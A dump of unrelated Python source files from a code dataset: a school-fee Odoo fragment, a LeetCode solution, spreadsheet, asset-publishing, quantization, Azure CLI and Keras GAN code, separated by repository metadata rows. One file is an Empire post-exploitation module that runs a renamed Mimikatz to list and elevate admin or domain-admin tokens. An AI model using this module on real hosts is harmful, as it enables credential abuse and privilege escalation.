if not fee_computation_line_rec.name.fees_discount.property_account_income.id:
raise except_orm(_("Warning!"), _('Please define account Income for %s.')%(fee_computation_line_rec.name.fees_discount.name))
else:
next_year_advance_fee_line_data.append((0,0,{
'name' : fee_computation_line_rec.name.fees_discount.id,
'description' : fee_computation_line_rec.name.fees_discount.name,
'account_id' : self.student_id.property_account_customer_advance.id,
'priority' : 0,
'amount' : -(fee_computation_line_rec.discount_amount),
'rem_amount' : -(fee_computation_line_rec.discount_amount),
}))
#check if NYAF already exists and state in unpaid or partially paid... if yes then update else create new
#next_year_advance_fee_id = next_year_advance_fee_obj.search([('partner_id','=', self.student_id.id),('reg_id', '=', self.id),('batch_id', '=', self.batch_id.id),('state','in', ('fee_unpaid','fee_partial_paid'))])
next_year_advance_fee_id = next_year_advance_fee_obj.search([('partner_id','=', self.student_id.id),('reg_id', '=', self.id),('batch_id', '=', self.batch_id.id),('state','in', ('fee_unpaid','fee_partial_paid','fee_paid'))])
if next_year_advance_fee_id :
for next_year_advance_fee_line_id in next_year_advance_fee_id.next_year_advance_fee_line_ids :
if next_year_advance_fee_line_id.amount < 0:
next_year_advance_fee_line_id.unlink()
else :
for next_year_advance_fee_line in next_year_advance_fee_line_data :
if next_year_advance_fee_line_id.name.id == next_year_advance_fee_line[2]['name'] :
next_year_advance_fee_line_id.amount = next_year_advance_fee_line[2]['amount']
next_year_advance_fee_line_id.rem_amount = next_year_advance_fee_line[2]['rem_amount']
for next_year_advance_fee_line in next_year_advance_fee_line_data :
if next_year_advance_fee_line[2]['amount'] < 0 :
next_year_advance_fee_id.write({'next_year_advance_fee_line_ids' : [next_year_advance_fee_line]})
return next_year_advance_fee_id
else :
next_year_advance_fee_data = {
'partner_id' : self.student_id.id,
'reg_id' : self.id,
'enq_date' : self.application_date,
'order_id' : '/',
'batch_id' : self.batch_id.id,
'state' : 'fee_unpaid',
'next_year_advance_fee_line_ids' : next_year_advance_fee_line_data,
}
new_obj = next_year_advance_fee_obj.create(next_year_advance_fee_data)
return new_obj
@api.multi
def send_payfort_acd_pay_link_computation(self):
"""
this method used to send payfort link for
online payment of student acd fee.
------------------------------------------
@param self : object pointer
@net_amount : calculated amount
@dis_amount : discount amount on calculated amount
@total_net_amount : total calculated amount - total discount
"""
amount_on_link = 0.00
if self._context.has_key('flag') and self._context.get('flag') == True:
if self.fee_structure_confirm != True:
raise except_orm(_("Warning!"), _('Please Confirm the fee structure before sending payment link.'))
if self.invoice_id:
order_id = self.invoice_id.invoice_number
amount_on_link = self.invoice_id.residual
elif self.next_year_advance_fee_id:
order_id = self.next_year_advance_fee_id.order_id
amount_on_link = self.next_year_advance_fee_id.residual
else:
if self.batch_id.current_academic != True:
# create NYAF if not current academic year
get_record = self.send_payfort_acd_for_next_year_computation()
self.next_year_advance_fee_id = get_record.id
order_id = get_record.order_id
# generate payble fee records
payable_fee_recs = self.generate_payable_fee_recs(True)
@api.multi
def compute_fee_structure(self):
fee_computation_obj = self.env['fee.computation']
fee_computation_line_obj = self.env['fee.computation.line']
if self.student_id.fee_computation_ids :
#remove previous years fee computation lines
if self.student_id.fee_computation_ids :
for fee_computation_rec in self.student_id.fee_computation_ids :
fee_computation_rec.unlink()
#create new fee computation lines
self.student_id.update_fee_structure()
#create same lines to registration fee computation
if self.student_id.fee_computation_ids :
for fee_computation_rec in self.student_id.fee_computation_ids :
fee_computation_line_ids = []
for fee_computation_line_rec in fee_computation_rec.fee_computation_line_ids :
fee_computation_line_vals = {
'name' : fee_computation_line_rec.name.id,
'calculated_amount' : fee_computation_line_rec.calculated_amount,
'discount_percentage' : fee_computation_line_rec.discount_percentage,
'discount_amount' : round(fee_computation_line_rec.discount_amount),
'payable_amount' : round(fee_computation_line_rec.payable_amount),
'fee_payment_type_id' : fee_computation_line_rec.fee_payment_type_id.id,
}
fee_computation_line_ids.append((0,0,fee_computation_line_vals))
fee_computation_vals = {
'month_id' : fee_computation_rec.month_id.id,
'fee_date' : fee_computation_rec.fee_date,
'fee_computation_line_ids' : fee_computation_line_ids, #[ (6, 0, fee_computation_line_ids_list) ],
'total_calculated_amount' : fee_computation_rec.total_calculated_amount,
'total_discount_amount' : fee_computation_rec.total_discount_amount,
'invoice_amount' : fee_computation_rec.invoice_amount,
'discount_category_id' : fee_computation_rec.discount_category_id.id,
'status' : fee_computation_rec.status,
'registration_id' : self.id
}
fee_computation_id = fee_computation_obj.create(fee_computation_vals)
@api.multi
def confirm_done_fee_structure_computation(self):
self.compute_fee_structure()
###### Start : from confirm_done_fee_structure of edsys_edu/models/registration
self.fee_structure_confirm = True
# send mail for link to pay acd fee online
# self.send_payfort_acd_pay_link()---------- old code
self.send_payfort_acd_pay_link_computation()
self.current_date_for_link = base64.b64encode(str(datetime.date.today()))
# send mail for extra form fillup and genarate link for same,
self.send_mail_for_extra_form_fillup()
dumy_date = base64.b64encode('0000-00-00')
self.remaining_form_link = '/student/verification?ENQUIRY=%s&DATE=%s'%(self.enquiry_no,dumy_date)
self.confirm_fee_date = datetime.datetime.now()
###### End : from confirm_done_fee_structure of edsys_edu/models/registration
#raise except_orm(_("Warning!"), _('stop'))
@api.multi
def confirm_fee_structure(self):
if self.student_id.fee_computation_ids :
#remove previous years fee computation lines
for fee_computation_rec in self.student_id.fee_computation_ids :
fee_computation_rec.unlink()
if self.fee_computation_ids :
#remove previous years fee computation lines from registration
for fee_computation_rec in self.fee_computation_ids :
fee_computation_rec.unlink()
res = super(Registration, self).confirm_fee_structure()
if self.discount_applicable_date :
discount_applicable_date_formatted = datetime.datetime.strptime(self.discount_applicable_date, "%Y-%m-%d").date()
self.student_id.discount_applicable_date = discount_applicable_date_formatted
| [
"redbytes.test@gmail.com"
] | redbytes.test@gmail.com |
f99658226c6f0dbf526e4279f61ca16cfd909486 | 942ee5e8d54e8ebe9c5c841fbfdd1da652946944 | /1001-1500/1467.Probability of a Two Boxes Having The Same Number of Distinct Balls.py | 5e7f9b3fd1966c2ca99755119191d27b2d196478 | [] | no_license | kaiwensun/leetcode | 0129c174457f32887fbca078fb448adce46dd89d | 6b607f4aae3a4603e61f2e2b7480fdfba1d9b947 | refs/heads/master | 2023-08-31T07:30:50.459062 | 2023-08-27T07:59:16 | 2023-08-27T07:59:16 | 57,526,914 | 69 | 9 | null | 2023-08-20T06:34:41 | 2016-05-01T05:37:29 | Python | UTF-8 | Python | false | false | 1,431 | py | import functools, collections
class Solution:
def getProbability(self, balls: List[int]) -> float:
box_size = sum(balls) // 2
factorial = [1] * (max(balls) + 1 + 100)
for i in range(1, len(factorial)):
factorial[i] = factorial[i - 1] * i
def choose(total, select):
return factorial[total] // (factorial[select] * factorial[total - select])
def search(color, space_l, space_r, uniq_l, uniq_r):
cnt_uniq = cnt_total = 0
if color == len(balls):
assert(space_l == space_r == 0)
if uniq_l == uniq_r:
return 1, 1
else:
return 0, 1
for left in range(balls[color] + 1):
right = balls[color] - left
if left > space_l or right > space_r:
continue
new_uniq_l = uniq_l + (1 if left else 0)
new_uniq_r = uniq_r + (1 if right else 0)
rtn_uniq, rtn_total = search(color + 1, space_l - left, space_r - right, new_uniq_l, new_uniq_r)
weight = choose(space_l, left) * choose(space_r, right)
cnt_uniq += rtn_uniq * weight
cnt_total += rtn_total * weight
return cnt_uniq, cnt_total
stats = search(0, box_size, box_size, 0, 0)
return float(stats[0]) / stats[1]
| [
"noreply@github.com"
] | kaiwensun.noreply@github.com |
4258a6ba19ea4d7cf50cab6bbeb0bd1e93cb00b0 | 1860aa3e5c0ba832d6dd12bb9af43a9f7092378d | /modules/xlwt3-0.1.2/examples/col_width.py | 90d82eb9415a897615d41007b926e35096306e1a | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | agz1990/GitPython | d90de16451fab9222851af790b67bcccdf35ab75 | 951be21fbf8477bad7d62423b72c3bc87154357b | refs/heads/master | 2020-08-06T18:12:26.459541 | 2015-07-05T14:58:57 | 2015-07-05T14:58:57 | 12,617,111 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | #!/usr/bin/env python
# -*- coding: windows-1251 -*-
# Copyright (C) 2005 Kiseliov Roman
from xlwt3 import *
w = Workbook()
ws = w.add_sheet('Hey, Dude')
for i in range(6, 80):
fnt = Font()
fnt.height = i*20
style = XFStyle()
style.font = fnt
ws.write(1, i, 'Test')
ws.col(i).width = 0x0d00 + i
w.save('col_width.xls')
| [
"522360568@qq.com"
] | 522360568@qq.com |
723c1499308ef1947356732e42ee5c9030771c94 | 20c80f722c451b64d05cc027b66a81e1976c3253 | /commons/libs/pyblish_starter/plugins/integrate_asset.py | 4dd833f1be3f9c0d61e553108a7956a38094f954 | [] | no_license | flypotatojun/Barbarian | 2d3fcb6fcb1b4495b6d62fc5e32634abf4638312 | efe14dd24c65b4852997dad1290e503211bcc419 | refs/heads/master | 2021-07-18T01:43:14.443911 | 2017-10-24T03:37:43 | 2017-10-24T03:37:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,421 | py | import pyblish.api
class IntegrateStarterAsset(pyblish.api.InstancePlugin):
"""Move user data to shared location
This plug-in exposes your data to others by encapsulating it
into a new version.
Schema:
Data is written in the following format.
____________________
| |
| version |
| ________________ |
| | | |
| | representation | |
| |________________| |
| | | |
| | ... | |
| |________________| |
|____________________|
"""
label = "Starter Asset"
order = pyblish.api.IntegratorOrder
families = [
"starter.model",
"starter.rig",
"starter.animation"
]
def process(self, instance):
import os
import json
import errno
import shutil
from pyblish_starter import api
context = instance.context
# Atomicity
#
# Guarantee atomic publishes - each asset contains
# an identical set of members.
# __
# / o
# / \
# | o |
# \ /
# o __/
#
if not all(result["success"] for result in context.data["results"]):
raise Exception("Atomicity not held, aborting.")
# Assemble
#
# |
# v
# ---> <----
# ^
# |
#
stagingdir = instance.data.get("stagingDir")
assert stagingdir, (
"Incomplete instance \"%s\": "
"Missing reference to staging area."
% instance
)
root = context.data["workspaceDir"]
instancedir = os.path.join(root, "shared", instance.data["name"])
try:
os.makedirs(instancedir)
except OSError as e:
if e.errno != errno.EEXIST: # Already exists
self.log.critical("An unexpected error occurred.")
raise
version = api.find_latest_version(os.listdir(instancedir)) + 1
versiondir = os.path.join(instancedir, api.format_version(version))
# Metadata
# _________
# | |.key = value
# | |
# | |
# | |
# | |
# |_________|
#
fname = os.path.join(stagingdir, ".metadata.json")
try:
with open(fname) as f:
metadata = json.load(f)
except IOError:
metadata = {
"schema": "pyblish-starter:version-1.0",
"version": version,
"path": versiondir,
"representations": list(),
# Collected by pyblish-base
"time": context.data["date"],
"author": context.data["user"],
# Collected by pyblish-maya
"source": os.path.join(
"{root}",
os.path.relpath(
context.data["currentFile"],
api.root()
)
),
}
for filename in instance.data.get("files", list()):
name, ext = os.path.splitext(filename)
metadata["representations"].append(
{
"schema": "pyblish-starter:representation-1.0",
"format": ext,
"path": "{dirname}/%s{format}" % name
}
)
# Write to disk
# _
# | |
# _| |_
# ____\ /
# |\ \ / \
# \ \ v \
# \ \________.
# \|________|
#
with open(fname, "w") as f:
json.dump(metadata, f, indent=4)
# Metadata is written before being validated -
# this way, if validation fails, the data can be
# inspected by hand from within the user directory.
api.schema.validate(metadata, "version")
shutil.copytree(stagingdir, versiondir)
self.log.info("Successfully integrated \"%s\" to \"%s\"" % (
instance, versiondir))
| [
"lonegather@users.noreply.github.com"
] | lonegather@users.noreply.github.com |
56010a4e310d6d54195272006cb696d231a7d78a | 5289db68f1573549b287750beed02bc9c37340d3 | /tools/pytorch-quantization/tests/print_test.py | 1a4dec6d13ceb244e45e7154cc07c869329a528f | [
"ISC",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | feizhouxiaozhu/TensorRT | 5d5ac8468f67121a96d68a76e43988630c483040 | af8f24cefba42e367ec09fbb05c08a2946645258 | refs/heads/master | 2023-02-08T10:35:41.382352 | 2020-12-19T00:48:00 | 2020-12-19T02:28:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,051 | py | #
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""test for str and repr
Make sure things can print and in a nice form. Put all the print tests together so that running this test file alone
can inspect all the print messages in the project
"""
import torch
from torch import nn
from pytorch_quantization import calib
from pytorch_quantization import tensor_quant
from pytorch_quantization import nn as quant_nn
from pytorch_quantization.nn.modules.tensor_quantizer import TensorQuantizer
# pylint:disable=missing-docstring, no-self-use
class TestPrint():
def test_print_descriptor(self):
test_desc = tensor_quant.QUANT_DESC_8BIT_CONV2D_WEIGHT_PER_CHANNEL
print(test_desc)
def test_print_tensor_quantizer(self):
test_quantizer = TensorQuantizer()
print(test_quantizer)
def test_print_module(self):
class _TestModule(nn.Module):
def __init__(self):
super(_TestModule, self).__init__()
self.conv = nn.Conv2d(33, 65, 3)
self.quant_conv = quant_nn.Conv2d(33, 65, 3)
self.linear = nn.Linear(33, 65)
self.quant_linear = quant_nn.Linear(33, 65)
test_module = _TestModule()
print(test_module)
def test_print_calibrator(self):
print(calib.MaxCalibrator(7, 1, False))
hist_calibrator = calib.HistogramCalibrator(8, None, True)
hist_calibrator.collect(torch.rand(10))
print(hist_calibrator)
| [
"rajeevsrao@users.noreply.github.com"
] | rajeevsrao@users.noreply.github.com |
ea488ecdd6f29b28a881a7505d69af2f10c4951b | 93872b89471eccf1414306216aa8b97df0c38cc4 | /lib/modules/credentials/mimigatoz/mimitokens.py | 79c4038c9c497452d99be0791f9929141f5078b4 | [
"BSD-3-Clause"
] | permissive | brownbelt/Empire-mod-Hackplayers | bcb1a7cd6f608e9b83011e19e1527d8ec120f932 | 315184020542012fdcf89ba4c0de0e5c00954372 | refs/heads/master | 2021-06-20T02:55:15.991222 | 2017-08-01T09:25:58 | 2017-08-01T09:25:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,522 | py | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-MimiGatoz Tokens',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-MimiGatoz function "
"to list or enumerate tokens."),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'list' : {
'Description' : 'Switch. List current tokens on the machine.',
'Required' : False,
'Value' : 'True'
},
'elevate' : {
'Description' : 'Switch. Elevate instead of listing tokens.',
'Required' : False,
'Value' : ''
},
'revert' : {
'Description' : 'Switch. Revert process token.',
'Required' : False,
'Value' : ''
},
'admin' : {
'Description' : 'Switch. List/elevate local admin tokens.',
'Required' : False,
'Value' : ''
},
'domainadmin' : {
'Description' : 'Switch. List/elevate domain admin tokens.',
'Required' : False,
'Value' : ''
},
'user' : {
'Description' : 'User name to list/elevate the token of.',
'Required' : False,
'Value' : ''
},
'id' : {
'Description' : 'Token ID to list/elevate the token of.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/credentials/Invoke-MimiGatoz.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
listTokens = self.options['list']['Value']
elevate = self.options['elevate']['Value']
revert = self.options['revert']['Value']
admin = self.options['admin']['Value']
domainadmin = self.options['domainadmin']['Value']
user = self.options['user']['Value']
processid = self.options['id']['Value']
script = moduleCode
script += "Invoke-MimiGatoz -Command "
if revert.lower() == "true":
script += "'\"token::revert"
else:
if listTokens.lower() == "true":
script += "'\"token::list"
elif elevate.lower() == "true":
script += "'\"token::elevate"
else:
print helpers.color("[!] list, elevate, or revert must be specified!")
return ""
if domainadmin.lower() == "true":
script += " /domainadmin"
elif admin.lower() == "true":
script += " /admin"
elif user.lower() != "":
script += " /user:" + str(user)
elif processid.lower() != "":
script += " /id:" + str(processid)
script += "\"';"
return script
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
0e382a491da509bd9913eff6eb831510b77bd9af | 446d9c9e98bac9bb7d6ba9d6f2639fd1ab0e68af | /pythonBook/chapter06/exercise6-23.py | 67d2bce0e2edc2ef0d9e9213eacb0216d837626a | [] | no_license | thiagofb84jp/python-exercises | 062d85f4f95332549acd42bf98de2b20afda5239 | 88ad7365a0f051021034ac6f0683b3df2de57cdb | refs/heads/main | 2023-07-19T21:15:08.689041 | 2021-08-17T10:59:09 | 2021-08-17T10:59:09 | 308,311,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 944 | py | """
6.23. Controle da utilização de salas de um cinema
"""
lugaresVagos = [10, 2, 1, 3, 0]
while True:
sala = int(input("Sala (0 para sair do programa) :"))
if sala == 0:
print("Encerrando o programa...")
break
if sala > len(lugaresVagos) or sala < 1:
print("Sala inválida!")
elif lugaresVagos[sala - 1] == 0:
print("Desculpe, sala lotada!")
else:
lugares = int(
input(f"Quantos lugares você deseja ({lugaresVagos[sala - 1]} \
vagos): "))
if lugares > lugaresVagos[sala - 1]:
print("Esse número de lugares não está disponível.")
elif lugares < 0:
print("Número inválido.")
else:
lugaresVagos[sala - 1] -= lugares
print(f"{lugares} lugares vendidos")
print("Utilização das salas")
for x, l in enumerate(lugaresVagos):
print(f"Sala {x + 1} - {l} lugar(es) vazio(s)")
| [
"thiagofb84jp@gmail.com"
] | thiagofb84jp@gmail.com |
ff76df49ad42e40b7da91b22b4e8c1c8a4a40fb2 | a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | /src/azure-cli/azure/cli/command_modules/cosmosdb/aaz/latest/cosmosdb/postgres/configuration/coordinator/__cmd_group.py | 27271cfb6425eebaca4fa2e123288c385ca59464 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | Azure/azure-cli | 13340eeca2e288e66e84d393fa1c8a93d46c8686 | a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca | refs/heads/dev | 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 | MIT | 2023-09-14T11:11:05 | 2016-02-04T00:21:51 | Python | UTF-8 | Python | false | false | 704 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command_group(
"cosmosdb postgres configuration coordinator",
is_preview=True,
)
class __CMDGroup(AAZCommandGroup):
"""Manage Azure Cosmos DB for PostgreSQL coordinator configurations.
"""
pass
__all__ = ["__CMDGroup"]
| [
"noreply@github.com"
] | Azure.noreply@github.com |
4a547b90b05cd7591bc9c34f4e87b2cd3a126aa1 | 7bbc83f3f84d7e5057cb04f6895082ab3e016e90 | /python.import/machine/test/car.py | 1c4fd081fd55c004711fe7a294435b5779d6ec81 | [] | no_license | osy1223/bit_seoul | 908f6adf007c0a7d0df2659b4fae75eb705acaea | b523d78c7b80d378a2d148b35466304f10bf4af4 | refs/heads/master | 2023-02-02T14:26:40.120989 | 2020-12-18T00:46:04 | 2020-12-18T00:46:04 | 311,279,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | def drive():
print('test 운전하다 ')
if __name__ == '__main__':
drive() | [
"osu1223@gmail.com"
] | osu1223@gmail.com |
cb606700b2241eebb71ead8c64124867f9a3a585 | f0f285567e706c1d89a730e9807ca44690f745ad | /0x0A-python-inheritance/6-base_geometry.py | 819d3ab4cf7e2b8ba06e805d561fffa5145b6703 | [] | no_license | Faith-qa/alx-higher_level_programming-1 | a43fc57414c6c946407d0795df5f9794a061a890 | 8f66f9a09088b55d44f1754ca616e75d83ca76c4 | refs/heads/main | 2023-08-07T16:41:39.830429 | 2021-09-28T06:40:49 | 2021-09-28T06:40:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | #!/usr/bin/python3
# 6-base_geometry.py
"""Defines a base geometry class BaseGeometry."""
class BaseGeometry:
"""Represent base geometry."""
def area(self):
"""Not implemented."""
raise Exception("area() is not implemented")
| [
"yosefsamuel22@gmail.com"
] | yosefsamuel22@gmail.com |
d053c0a0a25b58a278a960935bd26b497357d1c7 | e24f75482c0ae71fb0dfa6d49f3a82129569c2d9 | /changes/api/serializer/models/plan.py | 9f11af47bb2be272e1a5b9c4efd90040b5cc14a6 | [
"Apache-2.0"
] | permissive | OmarSkalli/changes | aaa6a0083c87b7d5876eb0557466be60dea45e34 | 5280b2cea13c314aeecc770853c14caaff6bbb93 | refs/heads/master | 2022-08-12T11:37:53.571741 | 2014-07-11T22:55:37 | 2014-07-11T22:55:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | import json
from changes.api.serializer import Serializer, register
from changes.models import ItemOption, Plan, Step
@register(Plan)
class PlanSerializer(Serializer):
def serialize(self, instance, attrs):
return {
'id': instance.id.hex,
'name': instance.label,
'steps': list(instance.steps),
'dateCreated': instance.date_created,
'dateModified': instance.date_modified,
}
@register(Step)
class StepSerializer(Serializer):
def get_attrs(self, item_list):
option_list = ItemOption.query.filter(
ItemOption.item_id.in_(r.id for r in item_list),
)
options_by_item = {}
for option in option_list:
options_by_item.setdefault(option.item_id, {})
options_by_item[option.item_id][option.name] = option.value
result = {}
for item in item_list:
result[item] = {'options': options_by_item.get(item.id, {})}
return result
def serialize(self, instance, attrs):
implementation = instance.get_implementation()
return {
'id': instance.id.hex,
'implementation': instance.implementation,
'order': instance.order,
'name': implementation.get_label() if implementation else '',
'data': json.dumps(dict(instance.data or {})),
'dateCreated': instance.date_created,
'options': attrs['options'],
}
| [
"cramer@dropbox.com"
] | cramer@dropbox.com |
022a783a51d72c922d8bb8e920468be3ff85df9f | dd415744288cf76c15021c486350b6dd11fe13f3 | /examples/mnist_acgan.py | 4dfd12038ee8932a587e6645e4517be04e195965 | [
"MIT"
] | permissive | kencoken/keras | 10a6c01c61b3b7c22820c8b56b2aa7fd44c43b6f | 3a495682c77eb8d594c695a53840dcc7c3ea5883 | refs/heads/master | 2020-12-24T11:10:35.447511 | 2018-11-23T13:33:38 | 2018-11-23T13:33:38 | 73,181,380 | 0 | 4 | NOASSERTION | 2018-11-23T13:33:39 | 2016-11-08T11:53:41 | Python | UTF-8 | Python | false | false | 11,329 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Train an Auxiliary Classifier Generative Adversarial Network (ACGAN) on the
MNIST dataset. See https://arxiv.org/abs/1610.09585 for more details.
You should start to see reasonable images after ~5 epochs, and good images
by ~15 epochs. You should use a GPU, as the convolution-heavy operations are
very slow on the CPU. Prefer the TensorFlow backend if you plan on iterating, as
the compilation time can be a blocker using Theano.
Timings:
Hardware | Backend | Time / Epoch
-------------------------------------------
CPU | TF | 3 hrs
Titan X (maxwell) | TF | 4 min
Titan X (maxwell) | TH | 7 min
Consult https://github.com/lukedeo/keras-acgan for more information and
example output
"""
from __future__ import print_function
from collections import defaultdict
try:
import cPickle as pickle
except ImportError:
import pickle
from PIL import Image
from six.moves import range
import keras.backend as K
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Embedding, merge, Dropout
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Convolution2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
from keras.utils.generic_utils import Progbar
import numpy as np
np.random.seed(1337)
K.set_image_dim_ordering('th')
def build_generator(latent_size):
# we will map a pair of (z, L), where z is a latent vector and L is a
# label drawn from P_c, to image space (..., 1, 28, 28)
cnn = Sequential()
cnn.add(Dense(1024, input_dim=latent_size, activation='relu'))
cnn.add(Dense(128 * 7 * 7, activation='relu'))
cnn.add(Reshape((128, 7, 7)))
# upsample to (..., 14, 14)
cnn.add(UpSampling2D(size=(2, 2)))
cnn.add(Convolution2D(256, 5, 5, border_mode='same',
activation='relu', init='glorot_normal'))
# upsample to (..., 28, 28)
cnn.add(UpSampling2D(size=(2, 2)))
cnn.add(Convolution2D(128, 5, 5, border_mode='same',
activation='relu', init='glorot_normal'))
# take a channel axis reduction
cnn.add(Convolution2D(1, 2, 2, border_mode='same',
activation='tanh', init='glorot_normal'))
# this is the z space commonly refered to in GAN papers
latent = Input(shape=(latent_size, ))
# this will be our label
image_class = Input(shape=(1,), dtype='int32')
# 10 classes in MNIST
cls = Flatten()(Embedding(10, latent_size,
init='glorot_normal')(image_class))
# hadamard product between z-space and a class conditional embedding
h = merge([latent, cls], mode='mul')
fake_image = cnn(h)
return Model(input=[latent, image_class], output=fake_image)
def build_discriminator():
# build a relatively standard conv net, with LeakyReLUs as suggested in
# the reference paper
cnn = Sequential()
cnn.add(Convolution2D(32, 3, 3, border_mode='same', subsample=(2, 2),
input_shape=(1, 28, 28)))
cnn.add(LeakyReLU())
cnn.add(Dropout(0.3))
cnn.add(Convolution2D(64, 3, 3, border_mode='same', subsample=(1, 1)))
cnn.add(LeakyReLU())
cnn.add(Dropout(0.3))
cnn.add(Convolution2D(128, 3, 3, border_mode='same', subsample=(2, 2)))
cnn.add(LeakyReLU())
cnn.add(Dropout(0.3))
cnn.add(Convolution2D(256, 3, 3, border_mode='same', subsample=(1, 1)))
cnn.add(LeakyReLU())
cnn.add(Dropout(0.3))
cnn.add(Flatten())
image = Input(shape=(1, 28, 28))
features = cnn(image)
# first output (name=generation) is whether or not the discriminator
# thinks the image that is being shown is fake, and the second output
# (name=auxiliary) is the class that the discriminator thinks the image
# belongs to.
fake = Dense(1, activation='sigmoid', name='generation')(features)
aux = Dense(10, activation='softmax', name='auxiliary')(features)
return Model(input=image, output=[fake, aux])
if __name__ == '__main__':
# batch and latent size taken from the paper
nb_epochs = 50
batch_size = 100
latent_size = 100
# Adam parameters suggested in https://arxiv.org/abs/1511.06434
adam_lr = 0.0002
adam_beta_1 = 0.5
# build the discriminator
discriminator = build_discriminator()
discriminator.compile(
optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),
loss=['binary_crossentropy', 'sparse_categorical_crossentropy']
)
# build the generator
generator = build_generator(latent_size)
generator.compile(optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),
loss='binary_crossentropy')
latent = Input(shape=(latent_size, ))
image_class = Input(shape=(1,), dtype='int32')
# get a fake image
fake = generator([latent, image_class])
# we only want to be able to train generation for the combined model
discriminator.trainable = False
fake, aux = discriminator(fake)
combined = Model(input=[latent, image_class], output=[fake, aux])
combined.compile(
optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),
loss=['binary_crossentropy', 'sparse_categorical_crossentropy']
)
# get our mnist data, and force it to be of shape (..., 1, 28, 28) with
# range [-1, 1]
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
X_train = np.expand_dims(X_train, axis=1)
X_test = (X_test.astype(np.float32) - 127.5) / 127.5
X_test = np.expand_dims(X_test, axis=1)
nb_train, nb_test = X_train.shape[0], X_test.shape[0]
train_history = defaultdict(list)
test_history = defaultdict(list)
for epoch in range(nb_epochs):
print('Epoch {} of {}'.format(epoch + 1, nb_epochs))
nb_batches = int(X_train.shape[0] / batch_size)
progress_bar = Progbar(target=nb_batches)
epoch_gen_loss = []
epoch_disc_loss = []
for index in range(nb_batches):
progress_bar.update(index)
# generate a new batch of noise
noise = np.random.uniform(-1, 1, (batch_size, latent_size))
# get a batch of real images
image_batch = X_train[index * batch_size:(index + 1) * batch_size]
label_batch = y_train[index * batch_size:(index + 1) * batch_size]
# sample some labels from p_c
sampled_labels = np.random.randint(0, 10, batch_size)
# generate a batch of fake images, using the generated labels as a
# conditioner. We reshape the sampled labels to be
# (batch_size, 1) so that we can feed them into the embedding
# layer as a length one sequence
generated_images = generator.predict(
[noise, sampled_labels.reshape((-1, 1))], verbose=0)
X = np.concatenate((image_batch, generated_images))
y = np.array([1] * batch_size + [0] * batch_size)
aux_y = np.concatenate((label_batch, sampled_labels), axis=0)
# see if the discriminator can figure itself out...
epoch_disc_loss.append(discriminator.train_on_batch(X, [y, aux_y]))
# make new noise. we generate 2 * batch size here such that we have
# the generator optimize over an identical number of images as the
# discriminator
noise = np.random.uniform(-1, 1, (2 * batch_size, latent_size))
sampled_labels = np.random.randint(0, 10, 2 * batch_size)
# we want to train the genrator to trick the discriminator
# For the generator, we want all the {fake, not-fake} labels to say
# not-fake
trick = np.ones(2 * batch_size)
epoch_gen_loss.append(combined.train_on_batch(
[noise, sampled_labels.reshape((-1, 1))], [trick, sampled_labels]))
print('\nTesting for epoch {}:'.format(epoch + 1))
# evaluate the testing loss here
# generate a new batch of noise
noise = np.random.uniform(-1, 1, (nb_test, latent_size))
# sample some labels from p_c and generate images from them
sampled_labels = np.random.randint(0, 10, nb_test)
generated_images = generator.predict(
